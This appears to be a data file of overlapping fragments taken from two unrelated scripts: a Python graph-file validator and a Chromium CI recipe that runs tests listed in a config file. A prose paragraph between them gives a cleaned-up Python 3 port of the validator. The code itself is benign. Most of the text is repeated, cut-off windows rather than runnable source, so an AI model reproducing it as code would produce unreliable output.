"% (n_max, len(v_set)) print 'vertex ids are not continuous, lost %d id.' %",
"print '(valid) start index: 1, max vertex idx: %d, total %d vertex.' %",
"n_max = -1 v_set = set() with open(filename) as fin: n_line = 0",
"filename: if len(v_list) != 2 and len(v_list) != 3: print '(invalid) at line",
"= -1 v_set = set() with open(filename) as fin: n_line = 0 for",
"(n_max - len(v_set) if 0 in v_set else n_max - len(v_set) + 1)",
"-*- coding: gbk -*- import sys def validate(filename): n_max = -1 v_set =",
"if 'adj' in filename: if len(v_list) < 2: print '(invalid) at line %d'",
"= set() with open(filename) as fin: n_line = 0 for line in fin:",
"gbk -*- import sys def validate(filename): n_max = -1 v_set = set() with",
"def validate(filename): n_max = -1 v_set = set() with open(filename) as fin: n_line",
"def main(): if len(sys.argv) != 2: print 'validate_graph.py graph_file' else: validate(sys.argv[1]) if __name__",
"at line %d' % n_line return if 'edge' in filename: if len(v_list) !=",
"% (n_max - len(v_set) if 0 in v_set else n_max - len(v_set) +",
"% n_line return if 'edge' in filename: if len(v_list) != 2 and len(v_list)",
"validate(filename): n_max = -1 v_set = set() with open(filename) as fin: n_line =",
"'adj' in filename: if len(v_list) < 2: print '(invalid) at line %d' %",
"max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) print 'vertex ids",
"0 in v_set else n_max - len(v_set) + 1) def main(): if len(sys.argv)",
"as fin: n_line = 0 for line in fin: n_line += 1 v_list",
"'(invalid) at line %d' % n_line return if 'edge' in filename: if len(v_list)",
"%d id.' % (n_max - len(v_set) if 0 in v_set else n_max -",
"0 in v_set: print '(valid) start index: 0, max vertex idx: %d, total",
"and 0 not in v_set: print '(valid) start index: 1, max vertex idx:",
"main(): if len(sys.argv) != 2: print 'validate_graph.py graph_file' else: validate(sys.argv[1]) if __name__ ==",
"< 2: print '(invalid) at line %d' % n_line return if 'edge' in",
"in v_list: vid = int(vid) if vid < 0: print '(invalid) at line",
"and len(v_list) != 3: print '(invalid) at line %d' % n_line return if",
"if len(sys.argv) != 2: print 'validate_graph.py graph_file' else: validate(sys.argv[1]) if __name__ == '__main__':",
"1 v_list = line.rstrip().split() if 'adj' in filename: if len(v_list) < 2: print",
"idx: %d, total %d vertex.' % (n_max, len(v_set)) elif len(v_set) == n_max +",
"print '(valid) start index: 0, max vertex idx: %d, total %d vertex.' %",
"0, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) print 'vertex",
"total %d vertex.' % (n_max, len(v_set)) print 'vertex ids are not continuous, lost",
"v_set: print '(valid) start index: 1, max vertex idx: %d, total %d vertex.'",
"at line %d' % n_line return if len(v_list) == 3: v_list = v_list[:",
"index: 0, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) print",
"total %d vertex.' % (n_max, len(v_set)) else: print '(valid) start index: 0, max",
"3: v_list = v_list[: 2] for vid in v_list: vid = int(vid) if",
"ids are not continuous, lost %d id.' % (n_max - len(v_set) if 0",
"%d' % n_line return if 'edge' in filename: if len(v_list) != 2 and",
"- len(v_set) if 0 in v_set else n_max - len(v_set) + 1) def",
"at line %d' % n_line return v_set.add(vid) if vid > n_max: n_max =",
"1, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) elif len(v_set)",
"line %d' % n_line return if len(v_list) == 3: v_list = v_list[: 2]",
"- len(v_set) + 1) def main(): if len(sys.argv) != 2: print 'validate_graph.py graph_file'",
"0 not in v_set: print '(valid) start index: 1, max vertex idx: %d,",
"len(v_set) == n_max and 0 not in v_set: print '(valid) start index: 1,",
"coding: gbk -*- import sys def validate(filename): n_max = -1 v_set = set()",
"n_line = 0 for line in fin: n_line += 1 v_list = line.rstrip().split()",
"return if 'edge' in filename: if len(v_list) != 2 and len(v_list) != 3:",
"n_line return if 'edge' in filename: if len(v_list) != 2 and len(v_list) !=",
"with open(filename) as fin: n_line = 0 for line in fin: n_line +=",
"return if len(v_list) == 3: v_list = v_list[: 2] for vid in v_list:",
"print '(invalid) at line %d' % n_line return if len(v_list) == 3: v_list",
"index: 1, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) elif",
"fin: n_line += 1 v_list = line.rstrip().split() if 'adj' in filename: if len(v_list)",
"start index: 0, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set))",
"'(valid) start index: 1, max vertex idx: %d, total %d vertex.' % (n_max,",
"== 3: v_list = v_list[: 2] for vid in v_list: vid = int(vid)",
"len(v_set)) else: print '(valid) start index: 0, max vertex idx: %d, total %d",
"1) def main(): if len(sys.argv) != 2: print 'validate_graph.py graph_file' else: validate(sys.argv[1]) if",
"(n_max, len(v_set)) print 'vertex ids are not continuous, lost %d id.' % (n_max",
"v_list[: 2] for vid in v_list: vid = int(vid) if vid < 0:",
"if vid > n_max: n_max = vid if len(v_set) == n_max and 0",
"0: print '(invalid) at line %d' % n_line return v_set.add(vid) if vid >",
"n_line += 1 v_list = line.rstrip().split() if 'adj' in filename: if len(v_list) <",
"!= 3: print '(invalid) at line %d' % n_line return if len(v_list) ==",
"else n_max - len(v_set) + 1) def main(): if len(sys.argv) != 2: print",
"'(valid) start index: 0, max vertex idx: %d, total %d vertex.' % (n_max,",
"'(invalid) at line %d' % n_line return if len(v_list) == 3: v_list =",
"vid < 0: print '(invalid) at line %d' % n_line return v_set.add(vid) if",
"in fin: n_line += 1 v_list = line.rstrip().split() if 'adj' in filename: if",
"(n_max, len(v_set)) elif len(v_set) == n_max + 1 and 0 in v_set: print",
"2 and len(v_list) != 3: print '(invalid) at line %d' % n_line return",
"print 'vertex ids are not continuous, lost %d id.' % (n_max - len(v_set)",
"line %d' % n_line return v_set.add(vid) if vid > n_max: n_max = vid",
"idx: %d, total %d vertex.' % (n_max, len(v_set)) else: print '(valid) start index:",
"v_set = set() with open(filename) as fin: n_line = 0 for line in",
"vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) elif len(v_set) == n_max",
"in v_set: print '(valid) start index: 0, max vertex idx: %d, total %d",
"-*- import sys def validate(filename): n_max = -1 v_set = set() with open(filename)",
"!= 2 and len(v_list) != 3: print '(invalid) at line %d' % n_line",
"n_max and 0 not in v_set: print '(valid) start index: 1, max vertex",
"n_max + 1 and 0 in v_set: print '(valid) start index: 0, max",
"v_list: vid = int(vid) if vid < 0: print '(invalid) at line %d'",
"v_list = v_list[: 2] for vid in v_list: vid = int(vid) if vid",
"are not continuous, lost %d id.' % (n_max - len(v_set) if 0 in",
"= v_list[: 2] for vid in v_list: vid = int(vid) if vid <",
"-1 v_set = set() with open(filename) as fin: n_line = 0 for line",
"int(vid) if vid < 0: print '(invalid) at line %d' % n_line return",
"start index: 1, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set))",
"line in fin: n_line += 1 v_list = line.rstrip().split() if 'adj' in filename:",
"total %d vertex.' % (n_max, len(v_set)) elif len(v_set) == n_max + 1 and",
"len(sys.argv) != 2: print 'validate_graph.py graph_file' else: validate(sys.argv[1]) if __name__ == '__main__': main()",
"print '(invalid) at line %d' % n_line return v_set.add(vid) if vid > n_max:",
"len(v_list) != 3: print '(invalid) at line %d' % n_line return if len(v_list)",
"%d' % n_line return v_set.add(vid) if vid > n_max: n_max = vid if",
"% n_line return v_set.add(vid) if vid > n_max: n_max = vid if len(v_set)",
"in v_set: print '(valid) start index: 1, max vertex idx: %d, total %d",
"v_set: print '(valid) start index: 0, max vertex idx: %d, total %d vertex.'",
"= vid if len(v_set) == n_max and 0 not in v_set: print '(valid)",
"+ 1 and 0 in v_set: print '(valid) start index: 0, max vertex",
"1 and 0 in v_set: print '(valid) start index: 0, max vertex idx:",
"if len(v_list) == 3: v_list = v_list[: 2] for vid in v_list: vid",
"line %d' % n_line return if 'edge' in filename: if len(v_list) != 2",
"vid = int(vid) if vid < 0: print '(invalid) at line %d' %",
"vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) else: print '(valid) start",
"%d vertex.' % (n_max, len(v_set)) print 'vertex ids are not continuous, lost %d",
"== n_max and 0 not in v_set: print '(valid) start index: 1, max",
"vertex.' % (n_max, len(v_set)) else: print '(valid) start index: 0, max vertex idx:",
"= int(vid) if vid < 0: print '(invalid) at line %d' % n_line",
"0, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) else: print",
"v_set.add(vid) if vid > n_max: n_max = vid if len(v_set) == n_max and",
"for line in fin: n_line += 1 v_list = line.rstrip().split() if 'adj' in",
"if vid < 0: print '(invalid) at line %d' % n_line return v_set.add(vid)",
"len(v_list) < 2: print '(invalid) at line %d' % n_line return if 'edge'",
"%d, total %d vertex.' % (n_max, len(v_set)) elif len(v_set) == n_max + 1",
"fin: n_line = 0 for line in fin: n_line += 1 v_list =",
"2: print '(invalid) at line %d' % n_line return if 'edge' in filename:",
"'(invalid) at line %d' % n_line return v_set.add(vid) if vid > n_max: n_max",
"elif len(v_set) == n_max + 1 and 0 in v_set: print '(valid) start",
"return v_set.add(vid) if vid > n_max: n_max = vid if len(v_set) == n_max",
"vertex.' % (n_max, len(v_set)) elif len(v_set) == n_max + 1 and 0 in",
"if 0 in v_set else n_max - len(v_set) + 1) def main(): if",
"%d' % n_line return if len(v_list) == 3: v_list = v_list[: 2] for",
"print '(invalid) at line %d' % n_line return if 'edge' in filename: if",
"index: 0, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) else:",
"set() with open(filename) as fin: n_line = 0 for line in fin: n_line",
"len(v_set)) print 'vertex ids are not continuous, lost %d id.' % (n_max -",
"vid > n_max: n_max = vid if len(v_set) == n_max and 0 not",
"idx: %d, total %d vertex.' % (n_max, len(v_set)) print 'vertex ids are not",
"+= 1 v_list = line.rstrip().split() if 'adj' in filename: if len(v_list) < 2:",
"v_list = line.rstrip().split() if 'adj' in filename: if len(v_list) < 2: print '(invalid)",
"and 0 in v_set: print '(valid) start index: 0, max vertex idx: %d,",
"# -*- coding: gbk -*- import sys def validate(filename): n_max = -1 v_set",
"len(v_set)) elif len(v_set) == n_max + 1 and 0 in v_set: print '(valid)",
"if len(v_list) != 2 and len(v_list) != 3: print '(invalid) at line %d'",
"not in v_set: print '(valid) start index: 1, max vertex idx: %d, total",
"not continuous, lost %d id.' % (n_max - len(v_set) if 0 in v_set",
"line.rstrip().split() if 'adj' in filename: if len(v_list) < 2: print '(invalid) at line",
"for vid in v_list: vid = int(vid) if vid < 0: print '(invalid)",
"> n_max: n_max = vid if len(v_set) == n_max and 0 not in",
"vid in v_list: vid = int(vid) if vid < 0: print '(invalid) at",
"n_max = vid if len(v_set) == n_max and 0 not in v_set: print",
"% (n_max, len(v_set)) else: print '(valid) start index: 0, max vertex idx: %d,",
"vid if len(v_set) == n_max and 0 not in v_set: print '(valid) start",
"vertex.' % (n_max, len(v_set)) print 'vertex ids are not continuous, lost %d id.'",
"lost %d id.' % (n_max - len(v_set) if 0 in v_set else n_max",
"len(v_set) == n_max + 1 and 0 in v_set: print '(valid) start index:",
"in filename: if len(v_list) != 2 and len(v_list) != 3: print '(invalid) at",
"n_line return v_set.add(vid) if vid > n_max: n_max = vid if len(v_set) ==",
"= line.rstrip().split() if 'adj' in filename: if len(v_list) < 2: print '(invalid) at",
"len(v_list) == 3: v_list = v_list[: 2] for vid in v_list: vid =",
"max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) else: print '(valid)",
"len(v_set) if 0 in v_set else n_max - len(v_set) + 1) def main():",
"(n_max, len(v_set)) else: print '(valid) start index: 0, max vertex idx: %d, total",
"+ 1) def main(): if len(sys.argv) != 2: print 'validate_graph.py graph_file' else: validate(sys.argv[1])",
"if len(v_list) < 2: print '(invalid) at line %d' % n_line return if",
"= 0 for line in fin: n_line += 1 v_list = line.rstrip().split() if",
"len(v_set) + 1) def main(): if len(sys.argv) != 2: print 'validate_graph.py graph_file' else:",
"len(v_list) != 2 and len(v_list) != 3: print '(invalid) at line %d' %",
"%d, total %d vertex.' % (n_max, len(v_set)) else: print '(valid) start index: 0,",
"n_line return if len(v_list) == 3: v_list = v_list[: 2] for vid in",
"0 for line in fin: n_line += 1 v_list = line.rstrip().split() if 'adj'",
"2] for vid in v_list: vid = int(vid) if vid < 0: print",
"if len(v_set) == n_max and 0 not in v_set: print '(valid) start index:",
"< 0: print '(invalid) at line %d' % n_line return v_set.add(vid) if vid",
"else: print '(valid) start index: 0, max vertex idx: %d, total %d vertex.'",
"max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) elif len(v_set) ==",
"vertex idx: %d, total %d vertex.' % (n_max, len(v_set)) print 'vertex ids are",
"n_max - len(v_set) + 1) def main(): if len(sys.argv) != 2: print 'validate_graph.py",
"in v_set else n_max - len(v_set) + 1) def main(): if len(sys.argv) !=",
"%d, total %d vertex.' % (n_max, len(v_set)) print 'vertex ids are not continuous,",
"3: print '(invalid) at line %d' % n_line return if len(v_list) == 3:",
"continuous, lost %d id.' % (n_max - len(v_set) if 0 in v_set else",
"in filename: if len(v_list) < 2: print '(invalid) at line %d' % n_line",
"open(filename) as fin: n_line = 0 for line in fin: n_line += 1",
"n_max: n_max = vid if len(v_set) == n_max and 0 not in v_set:",
"% (n_max, len(v_set)) elif len(v_set) == n_max + 1 and 0 in v_set:",
"%d vertex.' % (n_max, len(v_set)) elif len(v_set) == n_max + 1 and 0",
"if 'edge' in filename: if len(v_list) != 2 and len(v_list) != 3: print"
]
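
The largest row in this stretch shingles a Python 2 validate_graph.py: it walks a graph file line by line, enforces the column count ('adj' rows need a vertex plus at least one neighbour, 'edge' rows exactly two endpoints with an optional weight), collects every non-negative vertex id, and then reports whether the ids form a contiguous range starting at 0 or 1. A Python 3 port of the reconstructed script, with the print statements converted and the original gbk coding header dropped; the logic is otherwise as captured:

    import sys


    def validate(filename):
        n_max = -1
        v_set = set()
        with open(filename) as fin:
            n_line = 0
            for line in fin:
                n_line += 1
                v_list = line.rstrip().split()
                # Adjacency-list rows: a vertex id plus at least one neighbour.
                if 'adj' in filename:
                    if len(v_list) < 2:
                        print('(invalid) at line %d' % n_line)
                        return
                # Edge-list rows: two endpoints, optionally followed by a weight.
                if 'edge' in filename:
                    if len(v_list) != 2 and len(v_list) != 3:
                        print('(invalid) at line %d' % n_line)
                        return
                    if len(v_list) == 3:
                        v_list = v_list[:2]
                for vid in v_list:
                    vid = int(vid)
                    if vid < 0:
                        print('(invalid) at line %d' % n_line)
                        return
                    v_set.add(vid)
                    if vid > n_max:
                        n_max = vid
        # Contiguous 1-based ids: exactly n_max distinct ids, none of them 0.
        if len(v_set) == n_max and 0 not in v_set:
            print('(valid) start index: 1, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)))
        # Contiguous 0-based ids: n_max + 1 distinct ids, including 0.
        elif len(v_set) == n_max + 1 and 0 in v_set:
            print('(valid) start index: 0, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)))
        else:
            print('(valid) start index: 0, max vertex idx: %d, total %d vertex.' % (n_max, len(v_set)))
            print('vertex ids are not continuous, lost %d id.'
                  % (n_max - len(v_set) if 0 in v_set else n_max - len(v_set) + 1))


    def main():
        if len(sys.argv) != 2:
            print('validate_graph.py graph_file')
        else:
            validate(sys.argv[1])


    if __name__ == '__main__':
        main()
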
[
"Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout', default='master'), } def RunSteps(api,",
"result = api.python.inline( 'read tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f: print",
"import Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = {",
"print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests = [] for",
"'test: %s' % l cmd = l.split() if cmd[0] == 'python' and len(cmd)",
"source code is governed by a BSD-style license that can be # found",
"of this source code is governed by a BSD-style license that can be",
"'%s' % refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule',",
"and refspec must be given' assert repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git reset',",
"refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage: assert patch_storage == 'gerrit' assert patch_repository_url and",
"'./a.sh\\npython b.py\\npython c.py args'))) tests = [] for l in result.stdout.splitlines(): l =",
"patch_repository_url, patch_ref): if patch_storage: assert patch_storage == 'gerrit' assert patch_repository_url and patch_ref repo_url",
"patch_storage, patch_repository_url, patch_ref): if patch_storage: assert patch_storage == 'gerrit' assert patch_repository_url and patch_ref",
"%s' % l cmd = l.split() if cmd[0] == 'python' and len(cmd) >=",
"patch_storage: assert patch_storage == 'gerrit' assert patch_repository_url and patch_ref repo_url = patch_repository_url refspec",
"be given' assert repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git reset', ['git', 'reset', '--hard'])",
"assert repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git reset', ['git', 'reset', '--hard']) api.step('git fetch',",
"api.step('git reset', ['git', 'reset', '--hard']) api.step('git fetch', ['git', 'fetch', repo_url, '%s' % refspec])",
"if cmd[0] == 'python' and len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name,",
"result.stdout.splitlines(): l = l.strip() if l and not l.startswith('#'): tests.append(l) with api.step.defer_results(): for",
"api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra',",
"l.strip() if l and not l.startswith('#'): tests.append(l) with api.step.defer_results(): for l in sorted(tests):",
"yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield",
"in result.stdout.splitlines(): l = l.strip() if l and not l.startswith('#'): tests.append(l) with api.step.defer_results():",
"'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = { # New Gerrit patch properties. 'patch_storage': Property(kind=str,",
"l and not l.startswith('#'): tests.append(l) with api.step.defer_results(): for l in sorted(tests): name =",
"api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties(",
"'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule', 'update', '--init', '--recursive']) result = api.python.inline( 'read",
"patch_ref): if patch_storage: assert patch_storage == 'gerrit' assert patch_repository_url and patch_ref repo_url =",
"['git', 'submodule', 'update', '--init', '--recursive']) result = api.python.inline( 'read tests', # Multiplatform \"cat\"",
"RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage: assert patch_storage == 'gerrit' assert",
"if l and not l.startswith('#'): tests.append(l) with api.step.defer_results(): for l in sorted(tests): name",
"api.step.defer_results(): for l in sorted(tests): name = 'test: %s' % l cmd =",
"this source code is governed by a BSD-style license that can be #",
"= api.python.inline( 'read tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f: print f.read()\",",
"['git', 'init']) api.step('git reset', ['git', 'reset', '--hard']) api.step('git fetch', ['git', 'fetch', repo_url, '%s'",
"api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties( repository='https://chromium.googlesource.com/infra/infra', refspec='release-52' ) + api.override_step_data('test: ./a.sh',",
"step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests = [] for l in result.stdout.splitlines():",
"l in sorted(tests): name = 'test: %s' % l cmd = l.split() if",
"BSD-style license that can be # found in the LICENSE file. from recipe_engine.recipe_api",
"LICENSE file. from recipe_engine.recipe_api import Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step',",
"GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', )",
"= l.strip() if l and not l.startswith('#'): tests.append(l) with api.step.defer_results(): for l in",
"[ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = { # New Gerrit patch",
"'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), #",
"Gerrit patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref':",
"fetch', ['git', 'fetch', repo_url, '%s' % refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git",
"a Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout', default='master'), } def",
"+ api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') +",
"assert patch_storage == 'gerrit' assert patch_repository_url and patch_ref repo_url = patch_repository_url refspec =",
"patch_ref assert repo_url and refspec, 'repository url and refspec must be given' assert",
"'--init', '--recursive']) result = api.python.inline( 'read tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as",
"'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch jobs properties.",
"l.split() if cmd[0] == 'python' and len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:]) else:",
"in sorted(tests): name = 'test: %s' % l cmd = l.split() if cmd[0]",
"checkout', default='master'), } def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage: assert",
"} def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage: assert patch_storage ==",
"patch_repository_url refspec = patch_ref assert repo_url and refspec, 'repository url and refspec must",
"recipe_engine.recipe_api import Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES =",
"Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = { #",
"script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', )",
"param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout', default='master'), } def RunSteps(api, repo_url, refspec, patch_storage,",
"given' assert repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git reset', ['git', 'reset', '--hard']) api.step('git",
"cmd) def GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver(",
"<filename>scripts/slave/recipes/simple_ci.py # Copyright 2016 The Chromium Authors. All rights reserved. # Use of",
"jobs properties. 'repository': Property(kind=str, help='Full url to a Git repository', default=None, param_name='repo_url'), 'refspec':",
"url to a Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout', default='master'),",
"'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = { # New Gerrit patch properties. 'patch_storage':",
"'--recursive']) result = api.python.inline( 'read tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f:",
"repo_url and refspec, 'repository url and refspec must be given' assert repo_url.startswith('https://') api.step('git",
"as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests =",
"'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = { # New Gerrit patch properties.",
"l.startswith('#'): tests.append(l) with api.step.defer_results(): for l in sorted(tests): name = 'test: %s' %",
"api.step('git init', ['git', 'init']) api.step('git reset', ['git', 'reset', '--hard']) api.step('git fetch', ['git', 'fetch',",
"New Gerrit patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None),",
"help='Refspec to checkout', default='master'), } def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if",
"assert repo_url and refspec, 'repository url and refspec must be given' assert repo_url.startswith('https://')",
"\"with open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args')))",
"patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str,",
"def GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra',",
"args'))) tests = [] for l in result.stdout.splitlines(): l = l.strip() if l",
"repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties( repository='https://chromium.googlesource.com/infra/infra',",
"[] for l in result.stdout.splitlines(): l = l.strip() if l and not l.startswith('#'):",
"'reset', '--hard']) api.step('git fetch', ['git', 'fetch', repo_url, '%s' % refspec]) api.step('git checkout', ['git',",
"f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests = []",
"and patch_ref repo_url = patch_repository_url refspec = patch_ref assert repo_url and refspec, 'repository",
"Authors. All rights reserved. # Use of this source code is governed by",
"'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule', 'update', '--init', '--recursive']) result = api.python.inline(",
"'init']) api.step('git reset', ['git', 'reset', '--hard']) api.step('git fetch', ['git', 'fetch', repo_url, '%s' %",
"'patch_ref': Property(kind=str, default=None), # Non-patch jobs properties. 'repository': Property(kind=str, help='Full url to a",
"] PROPERTIES = { # New Gerrit patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url':",
"2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def GenTests(api): yield api.test('ci') + api.properties(",
"default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch jobs properties. 'repository': Property(kind=str,",
"file. from recipe_engine.recipe_api import Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ]",
"'--hard']) api.step('git fetch', ['git', 'fetch', repo_url, '%s' % refspec]) api.step('git checkout', ['git', 'checkout',",
"The Chromium Authors. All rights reserved. # Use of this source code is",
"Use of this source code is governed by a BSD-style license that can",
"api.step('git submodule update', ['git', 'submodule', 'update', '--init', '--recursive']) result = api.python.inline( 'read tests',",
"['git', 'reset', '--hard']) api.step('git fetch', ['git', 'fetch', repo_url, '%s' % refspec]) api.step('git checkout',",
"Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch jobs properties. 'repository':",
"'submodule', 'update', '--init', '--recursive']) result = api.python.inline( 'read tests', # Multiplatform \"cat\" \"with",
"found in the LICENSE file. from recipe_engine.recipe_api import Property DEPS = [ 'recipe_engine/properties',",
"# Non-patch jobs properties. 'repository': Property(kind=str, help='Full url to a Git repository', default=None,",
"tests = [] for l in result.stdout.splitlines(): l = l.strip() if l and",
"default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch jobs",
"refspec = patch_ref assert repo_url and refspec, 'repository url and refspec must be",
"Property(kind=str, help='Refspec to checkout', default='master'), } def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref):",
"must be given' assert repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git reset', ['git', 'reset',",
"api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule', 'update', '--init', '--recursive'])",
"Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch",
"'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch jobs properties. 'repository': Property(kind=str, help='Full",
"in the LICENSE file. from recipe_engine.recipe_api import Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python',",
"'repository url and refspec must be given' assert repo_url.startswith('https://') api.step('git init', ['git', 'init'])",
"= { # New Gerrit patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None),",
"PROPERTIES = { # New Gerrit patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str,",
"stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests = [] for l in",
"to checkout', default='master'), } def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage:",
"repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout', default='master'), } def RunSteps(api, repo_url,",
"% l cmd = l.split() if cmd[0] == 'python' and len(cmd) >= 2:",
"code is governed by a BSD-style license that can be # found in",
"to a Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout', default='master'), }",
"if patch_storage: assert patch_storage == 'gerrit' assert patch_repository_url and patch_ref repo_url = patch_repository_url",
"gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties( repository='https://chromium.googlesource.com/infra/infra', refspec='release-52' ) + api.override_step_data('test: ./a.sh', retcode=1)",
"rights reserved. # Use of this source code is governed by a BSD-style",
